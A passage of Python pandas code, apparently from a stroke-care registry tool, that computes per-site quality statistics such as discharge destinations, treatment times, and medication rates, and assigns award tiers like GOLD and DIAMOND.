self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_SAME_FACILITY", value=2, new_column_name='# transferred within the same centre - Post-care bed')
self.statsDf['% transferred within the same centre - Post-care bed'] = self.statsDf.apply(lambda x: round(((x['# transferred within the same centre - Post-care bed']/x['discharge_subset_same_centre_patients']) * 100), 2) if x['discharge_subset_same_centre_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_SAME_FACILITY", value=3, new_column_name='# transferred within the same centre - Another department')
self.statsDf['% transferred within the same centre - Another department'] = self.statsDf.apply(lambda x: round(((x['# transferred within the same centre - Another department']/x['discharge_subset_same_centre_patients']) * 100), 2) if x['discharge_subset_same_centre_patients'] > 0 else 0, axis=1)
############################################
# DISCHARGE DESTINATION - ANOTHER FACILITY #
############################################
discharge_subset_another_centre = discharge_subset[discharge_subset['DISCHARGE_DESTINATION'].isin([3])].copy()
self.statsDf['discharge_subset_another_centre_patients'] = self._count_patients(dataframe=discharge_subset_another_centre)
self.tmp = discharge_subset_another_centre.groupby(['Protocol ID', 'DISCHARGE_OTHER_FACILITY']).size().to_frame('count').reset_index()
# Calculate number of patients entered to the old form
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_OTHER_FACILITY", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_OTHER_FACILITY", value=1, new_column_name='# transferred to another centre - Stroke centre')
self.statsDf['% transferred to another centre - Stroke centre'] = self.statsDf.apply(lambda x: round(((x['# transferred to another centre - Stroke centre']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_OTHER_FACILITY", value=2, new_column_name='# transferred to another centre - Comprehensive stroke centre')
self.statsDf['% transferred to another centre - Comprehensive stroke centre'] = self.statsDf.apply(lambda x: round(((x['# transferred to another centre - Comprehensive stroke centre']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_OTHER_FACILITY", value=3, new_column_name='# transferred to another centre - Another hospital')
self.statsDf['% transferred to another centre - Another hospital'] = self.statsDf.apply(lambda x: round(((x['# transferred to another centre - Another hospital']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
#########################################################
# DISCHARGE DESTINATION - ANOTHER FACILITY - DEPARTMENT #
#########################################################
self.tmp = discharge_subset_another_centre.groupby(['Protocol ID', 'DISCHARGE_OTHER_FACILITY_O1']).size().to_frame('count').reset_index()
tmp_o2 = discharge_subset_another_centre.groupby(['Protocol ID', 'DISCHARGE_OTHER_FACILITY_O2']).size().to_frame('count').reset_index()
tmp_o3 = discharge_subset_another_centre.groupby(['Protocol ID', 'DISCHARGE_OTHER_FACILITY_O3']).size().to_frame('count').reset_index()
del discharge_subset_another_centre
# Calculate number of patients entered to the old form
self.statsDf.loc[:, 'tmp'] = 0
self.statsDf['# department transferred to within another centre - Acute rehabilitation'] = self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O1", value=1, dataframe=self.tmp) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O2", value=1, dataframe=tmp_o2) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O3", value=1, dataframe=tmp_o3)
self.statsDf['% department transferred to within another centre - Acute rehabilitation'] = self.statsDf.apply(lambda x: round(((x['# department transferred to within another centre - Acute rehabilitation']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf['# department transferred to within another centre - Post-care bed'] = self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O1", value=2, dataframe=self.tmp) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O2", value=2, dataframe=tmp_o2) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O3", value=2, dataframe=tmp_o3)
self.statsDf['% department transferred to within another centre - Post-care bed'] = self.statsDf.apply(lambda x: round(((x['# department transferred to within another centre - Post-care bed']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf['# department transferred to within another centre - Neurology'] = self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O1", value=3, dataframe=self.tmp) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O2", value=3, dataframe=tmp_o2) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O3", value=3, dataframe=tmp_o3)
self.statsDf['% department transferred to within another centre - Neurology'] = self.statsDf.apply(lambda x: round(((x['# department transferred to within another centre - Neurology']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf['# department transferred to within another centre - Another department'] = self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O1", value=4, dataframe=self.tmp) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O2", value=4, dataframe=tmp_o2) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O3", value=4, dataframe=tmp_o3)
self.statsDf['% department transferred to within another centre - Another department'] = self.statsDf.apply(lambda x: round(((x['# department transferred to within another centre - Another department']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
############################################
# DISCHARGE DESTINATION - ANOTHER FACILITY #
############################################
discharge_subset.fillna(0, inplace=True)
discharge_subset_mrs = discharge_subset[~discharge_subset['DISCHARGE_MRS'].isin([0])].copy()
del discharge_subset
#discharge_subset_mrs['DISCHARGE_MRS'] = discharge_subset_mrs['DISCHARGE_MRS'].astype(float)
def convert_mrs_on_discharge(x):
""" The function calculating mRS on discharge. Options: 1 (unknown/derivate), 2 = 0, 3 = 1, 4 = 2, 5 = 3, 6 = 4, 7 = 5, 8 = 6.
:param x: the mRS value from the dropdown
:type x: int
:returns: x -- value converted to score
"""
x = float(x)
if (x == 1):
x = x - 1
else:
x = x - 2
return x
if discharge_subset_mrs.empty:
self.statsDf['Median discharge mRS'] = 0
self.statsDf.fillna(0, inplace=True)
else:
discharge_subset_mrs['DISCHARGE_MRS_ADJUSTED'] = discharge_subset_mrs.apply(lambda row: convert_mrs_on_discharge(row['DISCHARGE_MRS']), axis=1)
discharge_subset_mrs['DISCHARGE_MRS_ADDED'] = discharge_subset_mrs['DISCHARGE_MRS_ADJUSTED'] + discharge_subset_mrs['D_MRS_SCORE']
discharge_subset_mrs.fillna(0, inplace=True)
self.statsDf = self.statsDf.merge(discharge_subset_mrs.groupby(['Protocol ID']).DISCHARGE_MRS_ADDED.agg(['median']).rename(columns={'median': 'Median discharge mRS'})['Median discharge mRS'].reset_index(), how='outer')
self.statsDf.fillna(0, inplace=True)
del discharge_subset_mrs
########################
# MEDIAN HOSPITAL STAY #
########################
positive_hospital_days = self.df[self.df['HOSPITAL_DAYS'] > 0]
self.statsDf = self.statsDf.merge(positive_hospital_days.groupby(['Protocol ID']).HOSPITAL_DAYS.agg(['median']).rename(columns={'median': 'Median hospital stay (days)'})['Median hospital stay (days)'].reset_index(), how='outer')
self.statsDf.fillna(0, inplace=True)
del positive_hospital_days
###########################
# MEDIAN LAST SEEN NORMAL #
###########################
self.statsDf = self.statsDf.merge(self.df[self.df['LAST_SEEN_NORMAL'] != 0].groupby(['Protocol ID']).LAST_SEEN_NORMAL.agg(['median']).rename(columns={'median': 'Median last seen normal'})['Median last seen normal'].reset_index(), how='outer')
self.statsDf.fillna(0, inplace=True)
# ELIGIBLE RECANALIZATION
wrong_ivtpa = recanalization_procedure_iv_tpa.loc[recanalization_procedure_iv_tpa['IVTPA'] <= 0]
self.statsDf['wrong_ivtpa'] = self._count_patients(dataframe=wrong_ivtpa)
# self.statsDf.loc[:, '# patients eligible thrombolysis'] = self.statsDf.apply(lambda x: (x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment']) - x['wrong_ivtpa'], axis=1)
self.statsDf.loc[:, '# patients eligible thrombolysis'] = self.statsDf.apply(lambda x: x['# IV tPa'] - x['wrong_ivtpa'], axis=1)
self.statsDf.drop(['wrong_ivtpa'], inplace=True, axis=1)
del wrong_ivtpa
wrong_tby = recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['TBY'] <= 0]
self.statsDf['wrong_tby'] = self._count_patients(dataframe=wrong_tby)
self.statsDf.loc[:, '# patients eligible thrombectomy'] = self.statsDf.apply(lambda x: (x['# TBY'] - x['wrong_tby']), axis=1)
self.statsDf.drop(['wrong_tby'], inplace=True, axis=1)
# if country_code == 'CZ':
# self.statsDf.loc[:, '# patients eligible thrombectomy'] = self.statsDf.apply(lambda x: (x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] + x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre']) - x['wrong_tby'], axis=1)
#
# else:
# self.statsDf.loc[:, '# patients eligible thrombectomy'] = self.statsDf.apply(lambda x: (x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone']) - x['wrong_tby'], axis=1)
# self.statsDf.drop(['wrong_tby'], inplace=True, axis=1)
# self.statsDf.loc[:, 'patients_eligible_recanalization'] = self.statsDf.apply(lambda x: x['# recanalization procedures - Not done'] + x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'], axis=1)
del wrong_tby
ivt_tby_mix = isch.loc[(isch['IVT_DONE'] == 1) | (isch['TBY_DONE'] == 1)].copy()
self.statsDf['patients_eligible_recanalization'] = self._count_patients(dataframe=ivt_tby_mix)
del ivt_tby_mix
################
# ANGEL AWARDS #
################
self.total_patient_column = '# total patients >= {0}'.format(self.patient_limit)
self.statsDf[self.total_patient_column] = self.statsDf['Total Patients'] >= self.patient_limit
## Calculate classic recanalization procedure
#recanalization_procedure_tby_only_dtg = recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['RECANALIZATION_PROCEDURES'].isin([4])]
recanalization_procedure_tby_only_dtg = recanalization_procedure_tby_dtg.loc[
recanalization_procedure_tby_dtg['IVT_DONE'] == 0
]
# Create temporary dataframe only with rows where thrombolysis was performed under 60 minute
recanalization_procedure_iv_tpa_under_60 = recanalization_procedure_iv_tpa.loc[(recanalization_procedure_iv_tpa['IVTPA'] > 0) & (recanalization_procedure_iv_tpa['IVTPA'] <= 60)]
# Create temporary dataframe only with rows where thrombolysis was performed under 45 minute
recanalization_procedure_iv_tpa_under_45 = recanalization_procedure_iv_tpa.loc[(recanalization_procedure_iv_tpa['IVTPA'] > 0) & (recanalization_procedure_iv_tpa['IVTPA'] <= 45)]
del recanalization_procedure_iv_tpa
recanalization_procedure_tby_only_dtg_under_60 = recanalization_procedure_tby_only_dtg.loc[(recanalization_procedure_tby_only_dtg['TBY'] > 0) & (recanalization_procedure_tby_only_dtg['TBY'] <= 60)]
self.statsDf['# patients treated with door to recanalization therapy < 60 minutes'] = self._count_patients(dataframe=recanalization_procedure_iv_tpa_under_60) + self._count_patients(dataframe=recanalization_procedure_tby_only_dtg_under_60)
self.statsDf['% patients treated with door to recanalization therapy < 60 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to recanalization therapy < 60 minutes']/x['# patients recanalized']) * 100), 2) if x['# patients recanalized'] > 0 else 0, axis=1)
recanalization_procedure_tby_only_dtg_under_45 = recanalization_procedure_tby_only_dtg.loc[(recanalization_procedure_tby_only_dtg['TBY'] > 0) & (recanalization_procedure_tby_only_dtg['TBY'] <= 45)]
self.statsDf['# patients treated with door to recanalization therapy < 45 minutes'] = self._count_patients(dataframe=recanalization_procedure_iv_tpa_under_45) + self._count_patients(dataframe=recanalization_procedure_tby_only_dtg_under_45)
self.statsDf['% patients treated with door to recanalization therapy < 45 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to recanalization therapy < 45 minutes']/x['# patients recanalized']) * 100), 2) if x['# patients recanalized'] > 0 else 0, axis=1)
del recanalization_procedure_tby_only_dtg
#### DOOR TO THROMBOLYSIS THERAPY - MINUTES ####
# If thrombectomy done not at all, take the possible lowest award they can get
self.statsDf['# patients treated with door to thrombolysis < 60 minutes'] = self._count_patients(dataframe=recanalization_procedure_iv_tpa_under_60)
self.statsDf['% patients treated with door to thrombolysis < 60 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to thrombolysis < 60 minutes']/x['# patients eligible thrombolysis']) * 100), 2) if x['# patients eligible thrombolysis'] > 0 else 0, axis=1)
del recanalization_procedure_iv_tpa_under_60
self.statsDf['# patients treated with door to thrombolysis < 45 minutes'] = self._count_patients(dataframe=recanalization_procedure_iv_tpa_under_45)
self.statsDf['% patients treated with door to thrombolysis < 45 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to thrombolysis < 45 minutes']/x['# patients eligible thrombolysis']) * 100), 2) if x['# patients eligible thrombolysis'] > 0 else 0, axis=1)
del recanalization_procedure_iv_tpa_under_45
# Create temporary dataframe only with rows where trombectomy was performed under 90 minutes
recanalization_procedure_tby_only_dtg_under_120 = recanalization_procedure_tby_dtg.loc[(recanalization_procedure_tby_dtg['TBY'] > 0) & (recanalization_procedure_tby_dtg['TBY'] <= 120)]
# Create temporary dataframe only with rows where trombectomy was performed under 60 minutes
recanalization_procedure_tby_only_dtg_under_90 = recanalization_procedure_tby_dtg.loc[(recanalization_procedure_tby_dtg['TBY'] > 0) & (recanalization_procedure_tby_dtg['TBY'] <= 90)]
del recanalization_procedure_tby_dtg
self.statsDf['# patients treated with door to thrombectomy < 120 minutes'] = self._count_patients(dataframe=recanalization_procedure_tby_only_dtg_under_120)
self.statsDf['% patients treated with door to thrombectomy < 120 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to thrombectomy < 120 minutes']/x['# patients eligible thrombectomy']) * 100), 2) if x['# patients eligible thrombectomy'] > 0 else 0, axis=1)
del recanalization_procedure_tby_only_dtg_under_120
self.statsDf['# patients treated with door to thrombectomy < 90 minutes'] = self._count_patients(dataframe=recanalization_procedure_tby_only_dtg_under_90)
self.statsDf['% patients treated with door to thrombectomy < 90 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to thrombectomy < 90 minutes']/x['# patients eligible thrombectomy']) * 100), 2) if x['# patients eligible thrombectomy'] > 0 else 0, axis=1)
del recanalization_procedure_tby_only_dtg_under_90
#### RECANALIZATION RATE ####
self.statsDf['# recanalization rate out of total ischemic incidence'] = self.statsDf['# patients recanalized']
self.statsDf['% recanalization rate out of total ischemic incidence'] = self.statsDf['% patients recanalized']
#### CT/MRI ####
self.statsDf['# suspected stroke patients undergoing CT/MRI'] = self.statsDf['# CT/MRI - performed']
self.statsDf['% suspected stroke patients undergoing CT/MRI'] = self.statsDf['% CT/MRI - performed']
#### DYSPHAGIA SCREENING ####
self.statsDf['# all stroke patients undergoing dysphagia screening'] = self.statsDf['# dysphagia screening - Guss test'] + self.statsDf['# dysphagia screening - Other test']
self.statsDf['% all stroke patients undergoing dysphagia screening'] = self.statsDf.apply(lambda x: round(((x['# all stroke patients undergoing dysphagia screening']/(x['# all stroke patients undergoing dysphagia screening'] + x['# dysphagia screening - Not done'])) * 100), 2) if (x['# all stroke patients undergoing dysphagia screening'] + x['# dysphagia screening - Not done']) > 0 else 0, axis=1)
#### ISCHEMIC STROKE + NO AFIB + ANTIPLATELETS ####
# Exclude patients referred for recanalization procedure
non_transferred_antiplatelets = antithrombotics[~antithrombotics['RECANALIZATION_PROCEDURES'].isin([5,6])]
# Get temporary dataframe with patients who have prescribed antithrombotics and ischemic stroke
antiplatelets = non_transferred_antiplatelets[
non_transferred_antiplatelets['STROKE_TYPE'].isin([1])]
del non_transferred_antiplatelets
# Filter temporary dataframe and get only patients who have not been detected or not known for aFib flutter.
antiplatelets = antiplatelets[antiplatelets['AFIB_FLUTTER'].isin([4, 5])]
# Get patients who have prescribed antithrombotics
# exclude also patients with option 11 - applies to PT form
except_recommended = antiplatelets[~antiplatelets['ANTITHROMBOTICS'].isin([9, 11])]
# Get number of patients who have prescribed antithrombotics and ischemic stroke, have not been detected or not known for aFib flutter.
self.statsDf['except_recommended_patients'] = self._count_patients(dataframe=except_recommended)
# Get temporary dataframe groupby protocol ID and antithrombotics column
self.tmp = antiplatelets.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# ischemic stroke patients discharged with antiplatelets')
self.statsDf['% ischemic stroke patients discharged with antiplatelets'] = self.statsDf.apply(lambda x: round(((x['# ischemic stroke patients discharged with antiplatelets']/x['except_recommended_patients']) * 100), 2) if x['except_recommended_patients'] > 0 else 0, axis=1)
# discharged home
antiplatelets_discharged_home = antiplatelets[antiplatelets['DISCHARGE_DESTINATION'].isin([1])]
if (antiplatelets_discharged_home.empty):
self.tmp = antiplatelets.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# ischemic stroke patients discharged home with antiplatelets')
self.statsDf['% ischemic stroke patients discharged home with antiplatelets'] = self.statsDf.apply(lambda x: round(((x['# ischemic stroke patients discharged home with antiplatelets']/x['except_recommended_patients']) * 100), 2) if x['except_recommended_patients'] > 0 else 0, axis=1)
self.statsDf['except_recommended_discharged_home_patients'] = self.statsDf['except_recommended_patients']
else:
self.tmp = antiplatelets_discharged_home.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
# Get patients who have prescribed antithrombotics
except_recommended_discharged_home = except_recommended[except_recommended['DISCHARGE_DESTINATION'].isin([1])]
# Get number of patients who have prescribed antithrombotics and ischemic stroke, have not been detected or not known for aFib flutter.
self.statsDf['except_recommended_discharged_home_patients'] = self._count_patients(dataframe=except_recommended_discharged_home)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# ischemic stroke patients discharged home with antiplatelets')
self.statsDf['% ischemic stroke patients discharged home with antiplatelets'] = self.statsDf.apply(lambda x: round(((x['# ischemic stroke patients discharged home with antiplatelets']/x['except_recommended_discharged_home_patients']) * 100), 2) if x['except_recommended_discharged_home_patients'] > 0 else 0, axis=1)
# Comapre number of ischemic stroke patients discharged with antiplatelets to the discharged home with antiplatelets and select the higher value
self.statsDf['# ischemic stroke patients discharged (home) with antiplatelets'] = self.statsDf.apply(lambda x: x['# ischemic stroke patients discharged with antiplatelets'] if x['# ischemic stroke patients discharged with antiplatelets'] > x['# ischemic stroke patients discharged home with antiplatelets'] else x['# ischemic stroke patients discharged home with antiplatelets'], axis=1)
self.statsDf['% ischemic stroke patients discharged (home) with antiplatelets'] = self.statsDf.apply(lambda x: x['% ischemic stroke patients discharged with antiplatelets'] if x['% ischemic stroke patients discharged with antiplatelets'] > x['% ischemic stroke patients discharged home with antiplatelets'] else x['% ischemic stroke patients discharged home with antiplatelets'], axis=1)
#### ISCHEMIC STROKE + AFIB + ANTICOAGULANTS ####
afib_flutter_detected = is_tia.loc[
is_tia['AFIB_FLUTTER'].isin([1, 2, 3])
].copy()
# exclude also patients with option 11 - applies to PT form
anticoagulants_prescribed = afib_flutter_detected[
~afib_flutter_detected['ANTITHROMBOTICS'].isin([1, 10, 9, 11]) &
~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])
].copy()
not_transferred_afib_flutter_detected = afib_flutter_detected.loc[
~afib_flutter_detected['RECANALIZATION_PROCEDURES'].isin([5,6])
]
non_trasferred_anticoagulants = anticoagulants_prescribed[
~anticoagulants_prescribed['RECANALIZATION_PROCEDURES'].isin([5,6])
]
self.statsDf['# afib patients discharged with anticoagulants'] = self._count_patients(dataframe=non_trasferred_anticoagulants)
#self.statsDf['# afib patients discharged with anticoagulants'] = self._count_patients(dataframe=anticoagulants_prescribed)
# Get temporary dataframe with patients who are not dead with detected aFib flutter and with prescribed antithrombotics or with nothign (ANTITHROMBOTICS = 10)
# exclude also patients with option 11 - applies to PT form
afib_detected_discharged_home = not_transferred_afib_flutter_detected[
(~not_transferred_afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])) &
(~not_transferred_afib_flutter_detected['ANTITHROMBOTICS'].isin([1,9,11]))
]
# Get afib patients discharged and not dead
self.statsDf['afib_detected_discharged_patients'] = self._count_patients(dataframe=afib_detected_discharged_home)
# self.statsDf['% afib patients discharged with anticoagulants'] = self.statsDf.apply(lambda x: round(((x['# afib patients discharged with anticoagulants']/(x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients'])) * 100), 2) if (x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients']) > 0 else 0, axis=1)
self.statsDf['% afib patients discharged with anticoagulants'] = self.statsDf.apply(
lambda x: round((
(x['# afib patients discharged with anticoagulants']/x['afib_detected_discharged_patients']) * 100
), 2) if (x['afib_detected_discharged_patients']) > 0 else 0, axis=1
)
# Get temporary dataframe with patients who have prescribed anticoagulats and were discharged home
anticoagulants_prescribed_discharged_home = non_trasferred_anticoagulants[
non_trasferred_anticoagulants['DISCHARGE_DESTINATION'].isin([1])
]
# anticoagulants_prescribed_discharged_home = anticoagulants_prescribed[anticoagulants_prescribed['DISCHARGE_DESTINATION'].isin([1])]
# Get temporary dataframe with patients who have been discharge at home with detected aFib flutter and with prescribed antithrombotics
# afib_detected_discharged_home = afib_flutter_detected[(afib_flutter_detected['DISCHARGE_DESTINATION'].isin([1])) & (~afib_flutter_detected['ANTITHROMBOTICS'].isin([9]))]
# exclude also patients with option 11 - applies to PT form
afib_detected_discharged_home = not_transferred_afib_flutter_detected[
(not_transferred_afib_flutter_detected['DISCHARGE_DESTINATION'].isin([1])) &
(~not_transferred_afib_flutter_detected['ANTITHROMBOTICS'].isin([1,9,11]))
]
# Check if temporary dataframe is empty. If yes, the value is calculated not only for discharged home, but only dead patients are excluded
if (anticoagulants_prescribed_discharged_home.empty):
# afib patients discharged home with anticoagulants
anticoagulants_prescribed_discharged_home = non_trasferred_anticoagulants.copy()
# Get temporary dataframe with patients who are not dead with detected aFib flutter and with prescribed antithrombotics
# exclude also patients with option 11 - applies to PT form
afib_detected_discharged_home = not_transferred_afib_flutter_detected[
(~not_transferred_afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])) &
(~not_transferred_afib_flutter_detected['ANTITHROMBOTICS'].isin([1,9,11]))
]
# Get # afib patients discharged home with anticoagulants
self.statsDf['# afib patients discharged home with anticoagulants'] = self._count_patients(dataframe=anticoagulants_prescribed_discharged_home)
# Get afib patients discharged and not dead
self.statsDf['afib_detected_discharged_home_patients'] = self._count_patients(dataframe=afib_detected_discharged_home)
# Get % afib patients discharge with anticoagulants and not dead
self.statsDf['% afib patients discharged home with anticoagulants'] = self.statsDf.apply(lambda x: round(((x['# afib patients discharged home with anticoagulants']/x['afib_detected_discharged_home_patients']) * 100), 2) if x['afib_detected_discharged_home_patients'] > 0 else 0, axis=1)
else:
self.statsDf['# afib patients discharged home with anticoagulants'] = self._count_patients(dataframe=anticoagulants_prescribed_discharged_home)
# Get afib patients discharged home
self.statsDf['afib_detected_discharged_home_patients'] = self._count_patients(dataframe=afib_detected_discharged_home)
self.statsDf['% afib patients discharged home with anticoagulants'] = self.statsDf.apply(lambda x: round(((x['# afib patients discharged home with anticoagulants']/x['afib_detected_discharged_home_patients']) * 100), 2) if x['afib_detected_discharged_home_patients'] > 0 else 0, axis=1)
self.statsDf['# afib patients discharged (home) with anticoagulants'] = self.statsDf.apply(lambda x: x['# afib patients discharged with anticoagulants'] if x['% afib patients discharged with anticoagulants'] > x['% afib patients discharged home with anticoagulants'] else x['# afib patients discharged home with anticoagulants'], axis=1)
self.statsDf['% afib patients discharged (home) with anticoagulants'] = self.statsDf.apply(lambda x: x['% afib patients discharged with anticoagulants'] if x['% afib patients discharged with anticoagulants'] > x['% afib patients discharged home with anticoagulants'] else x['% afib patients discharged home with anticoagulants'], axis=1)
#### STROKE UNIT ####
# stroke patients treated in a dedicated stroke unit / ICU
self.statsDf['# stroke patients treated in a dedicated stroke unit / ICU'] = self.statsDf['# patients hospitalized in stroke unit / ICU']
# % stroke patients treated in a dedicated stroke unit / ICU
self.statsDf['% stroke patients treated in a dedicated stroke unit / ICU'] = self.statsDf['% patients hospitalized in stroke unit / ICU']
# Create temporary dataframe to calculate final award
self.angels_awards_tmp = self.statsDf[[self.total_patient_column, '% patients treated with door to recanalization therapy < 60 minutes', '% patients treated with door to recanalization therapy < 45 minutes', '% patients treated with door to thrombolysis < 60 minutes', '% patients treated with door to thrombolysis < 45 minutes', '% patients treated with door to thrombectomy < 120 minutes', '% patients treated with door to thrombectomy < 90 minutes', '% recanalization rate out of total ischemic incidence', '% suspected stroke patients undergoing CT/MRI', '% all stroke patients undergoing dysphagia screening', '% ischemic stroke patients discharged (home) with antiplatelets', '% afib patients discharged (home) with anticoagulants', '% stroke patients treated in a dedicated stroke unit / ICU', '# patients eligible thrombectomy', '# patients eligible thrombolysis']]
#self.angels_awards_tmp = self.statsDf[[self.total_patient_column, '% patients treated with door to recanalization therapy < 60 minutes', '% patients treated with door to recanalization therapy < 45 minutes', '% patients treated with door to thrombolysis < 60 minutes', '% patients treated with door to thrombolysis < 45 minutes', '% patients treated with door to thrombectomy < 120 minutes', '% patients treated with door to thrombectomy < 90 minutes', '% recanalization rate out of total ischemic incidence', '% suspected stroke patients undergoing CT/MRI', '% all stroke patients undergoing dysphagia screening', '% ischemic stroke patients discharged (home) with antiplatelets', '% patients prescribed anticoagulants with aFib', '% stroke patients treated in a dedicated stroke unit / ICU', '# patients eligible thrombectomy', '# patients eligible thrombolysis']]
self.statsDf.fillna(0, inplace=True)
self.angels_awards_tmp.loc[:, 'Proposed Award (old calculation)'] = self.angels_awards_tmp.apply(lambda x: self._get_final_award(x, new_calculation=False), axis=1)
self.angels_awards_tmp.loc[:, 'Proposed Award'] = self.angels_awards_tmp.apply(lambda x: self._get_final_award(x, new_calculation=True), axis=1)
self.statsDf['Proposed Award (old calculation)'] = self.angels_awards_tmp['Proposed Award (old calculation)']
self.statsDf['Proposed Award'] = self.angels_awards_tmp['Proposed Award']
self.statsDf.rename(columns={"Protocol ID": "Site ID"}, inplace=True)
self.statsDf.drop_duplicates(inplace=True)
self.sites = self._get_sites(self.statsDf)
del isch, is_ich_tia_cvt, is_ich_cvt, is_ich, is_tia, is_ich_sah_cvt, is_tia_cvt, cvt, ich_sah, ich, sah, discharge_subset_alive
def _get_final_award(self, x, new_calculation=True):
""" The function calculating the proposed award.
:param x: the row from temporary dataframe
:type x: pandas series
:returns: award -- the proposed award
"""
if x[self.total_patient_column] == False:
award = "STROKEREADY"
else:
if new_calculation:
thrombolysis_therapy_lt_60min = x['% patients treated with door to thrombolysis < 60 minutes']
# Calculate award for thrombolysis, if no patients were eligible for thrombolysis and number of total patients was greater than minimum than the award is set to DIAMOND
if (float(thrombolysis_therapy_lt_60min) >= 50 and float(thrombolysis_therapy_lt_60min) <= 74.99):
award = "GOLD"
elif (float(thrombolysis_therapy_lt_60min) >= 75):
award = "DIAMOND"
else:
award = "STROKEREADY"
thrombolysis_therapy_lt_45min = x['% patients treated with door to thrombolysis < 45 minutes']
if award != "STROKEREADY":
if (float(thrombolysis_therapy_lt_45min) <= 49.99):
if (award != "GOLD" or award == "DIAMOND"):
award = "PLATINUM"
elif (float(thrombolysis_therapy_lt_45min) >= 50):
if (award != "GOLD"):
award = "DIAMOND"
else:
award = "STROKEREADY"
# Calculate award for thrombectomy, if no patients were eligible for thrombectomy and number of total patients was greater than minimum than the award is set to the possible proposed award (eg. if in thrombolysis step award was set to GOLD then the award will be GOLD)
thrombectomy_pts = x['# patients eligible thrombectomy']
# if thrombectomy_pts != 0:
if thrombectomy_pts > 3:
thrombectomy_therapy_lt_120min = x['% patients treated with door to thrombectomy < 120 minutes']
if award != "STROKEREADY":
if (float(thrombectomy_therapy_lt_120min) >= 50 and float(thrombectomy_therapy_lt_120min) <= 74.99):
if (award == "PLATINUM" or award == "DIAMOND"):
award = "GOLD"
elif (float(thrombectomy_therapy_lt_120min) >= 75):
if (award == "DIAMOND"):
award = "DIAMOND"
else:
award = "STROKEREADY"
thrombectomy_therapy_lt_90min = x['% patients treated with door to thrombectomy < 90 minutes']
if award != "STROKEREADY":
if (float(thrombectomy_therapy_lt_90min) <= 49.99):
if (award != "GOLD" or award == "DIAMOND"):
award = "PLATINUM"
elif (float(thrombectomy_therapy_lt_90min) >= 50):
if (award == "DIAMOND"):
award = "DIAMOND"
else:
award = "STROKEREADY"
else:
recan_therapy_lt_60min = x['% patients treated with door to recanalization therapy < 60 minutes']
if (float(recan_therapy_lt_60min) >= 50 and float(recan_therapy_lt_60min) <= 74.99):
award = "GOLD"
elif (float(recan_therapy_lt_60min) >= 75):
award = "DIAMOND"
else:
award = "STROKEREADY"
